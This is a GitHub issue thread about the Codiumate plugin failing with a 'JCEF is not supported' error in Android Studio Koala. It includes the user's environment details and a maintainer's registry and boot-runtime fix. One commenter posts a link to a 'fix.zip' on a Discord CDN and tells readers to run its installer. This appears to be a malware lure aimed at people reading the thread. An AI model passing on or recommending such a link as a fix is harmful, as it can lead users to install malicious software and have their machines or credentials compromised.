### ISSUE TITLE
[0.9.3][ANDROID STUDIO Koala Feature Drop | 2024.1.2] JCEF is not supported.

### ISSUE THREAD

**Issue by priyanshumanash** [Codium-ai/codiumai-jetbrains-release#295]
# User Description
JCEF is not supported.
Jcef version: 119.4.7-g55e15c8-chromium-119.0.6045.199-api-1.14 
JCefAppConfig.class is not from a JBR module, url: jar:file:/C:/Program%20Files/Android/Android%20Studio2/lib/lib.jar!/com/jetbrains/cef/JCefAppConfig.class
requestId=2dafbe1f-3fc3-495c-b70a-30566938b5c5

# Stack Trace
```

```

# Other Information
```
=== About ===
Build version: Android Studio Koala Feature Drop | 2024.1.2 Build: #AI-241.18034.62.2412.12266719 August 23, 2024
Theme: VSCode Dark Modern
JRE: 17.0.11+0--11852314, JetBrains s.r.o.
JVM: 17.0.11+0--11852314, OpenJDK 64-Bit Server VM, JetBrains s.r.o.
Operating System: Windows 11.0 (amd64)

=== Plugins ===
Custom plugins: [JsonToDart (JSON To Dart) (2.16), Xcode-Dark Theme (1.2.4), Dart (241.18808), Appium Studio (24.8.993), Docker (241.18034.82), VSCode Theme (1.10.11), Bitbucket Linky (2023.1.301), Atom Material Icons (97.0.0), Codiumate - Code, test and review with confidence - by CodiumAI (0.9.3), Flutter (81.0.2), FlutterAssetsGenerator (2.4.2)]
Disabled plugins:[]
```

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ArtsiomCh** [comment]
Please follow proposed fix and it should help:

> 1. Navigate to the Help -> Find Action... and find(type) "Registry". Here disable `ide.browser.jcef.sandbox.enable` option (and make sure `ide.browser.jcef.enabled` option is enabled);
>   2. Navigate to the Help -> Find Action... and find(type) "Choose Boot Runtime for the IDE" dialog. Here, you can select a boot runtime equipped with JCEF;
>   3. Restart the IDE.
